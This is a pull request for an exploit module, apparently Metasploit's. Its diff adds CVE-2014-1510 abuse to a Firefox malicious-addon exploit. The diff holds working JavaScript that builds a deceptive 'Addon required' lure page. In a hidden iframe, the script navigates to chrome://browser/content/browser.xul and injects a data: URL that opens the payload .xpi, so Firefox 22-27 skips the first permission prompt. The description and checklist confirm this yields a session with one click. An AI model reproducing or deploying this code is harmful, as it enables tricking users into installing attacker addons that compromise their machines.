### PR TITLE
Add CVE-2014-1510 to firefox_xpi_bootstrapped_addon to bypass the first permission prompt on FF 27

### DIFF
--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -28,13 +28,18 @@ class Metasploit3 < Msf::Exploit::Remote
         be "bootstrapped". As the addon will execute the payload after
         each Firefox restart, an option can be given to automatically
         uninstall the addon once the payload has been executed.
+
+        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
+        first half of the permissions prompt.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'mihi', 'joev' ],
       'References'    =>
         [
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
-          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
+          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
+          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
+          [ 'CVE', '2014-1511' ]
         ],
       'DisclosureDate' => 'Jun 27 2007'
     ))
@@ -67,10 +72,42 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def generate_html
-    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
-    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
-    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
-    html << %Q|</body></html>|
-    return html
+    %Q|
+      <html><head><title>Loading, Please Wait...</title></head>
+        <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
+        <div style='visibility:hidden;width:1px;height:1px;'>
+          <iframe name='f'></iframe>
+        </div>
+        <script>
+          function install() {
+            window.location.href="addon.xpi";
+          }
+          #{web_idl_navigation}
+        </script>
+        </body>
+      </html>
+    |
+  end
+
+  # In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
+  # From there you can load the browser XUL, and inject a data URL into a nested frame.
+  # If the data URL opens the .xpi URL, the first permission prompt gets skipped.
+  def web_idl_navigation
+    %Q|
+      try {
+        c = new mozRTCPeerConnection;
+        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
+        setTimeout(function(){
+          try {
+            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
+                                  "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
+          } catch(e) {
+            install();
+          }
+        },600);
+      } catch(e) {
+        install();
+      }
+    |
   end
 end


### PR DESCRIPTION
This tweaks the `firefox_xpi_bootstrapped_addon` module to allow bypass of the first stage permission prompt for installing the addon on Firefox 22-27. Usually this is a 2 click exploit, this change makes it 1 click.

Also note that according to the [advisory](https://www.mozilla.org/security/announce/2014/mfsa2014-29.html), the vulnerability I am exploiting somehow allows code execution on FF 22-27 by loading a javascript URL with chrome privileges, but I have not figured out the magic required to get this to work.
#### Prompt 1 (now skipped)

![screen shot 2014-04-01 at 11 47 40 pm](https://cloud.githubusercontent.com/assets/1184013/2587505/7387c578-ba22-11e3-8647-2d6cc0d7ef19.png)
#### Prompt 2

![screen shot 2014-04-01 at 11 47 49 pm](https://cloud.githubusercontent.com/assets/1184013/2587506/755306ba-ba22-11e3-8be9-95fdf1b507a7.png)
### Verification
- [x] Both prompts required on firefox 21 and below, session is created when addon is installed
- [x] You should only encounter one prompt on firefox 22-27, session is created when addon is installed
- [x] Both prompts required on firefox 28, session is created when addon is installed
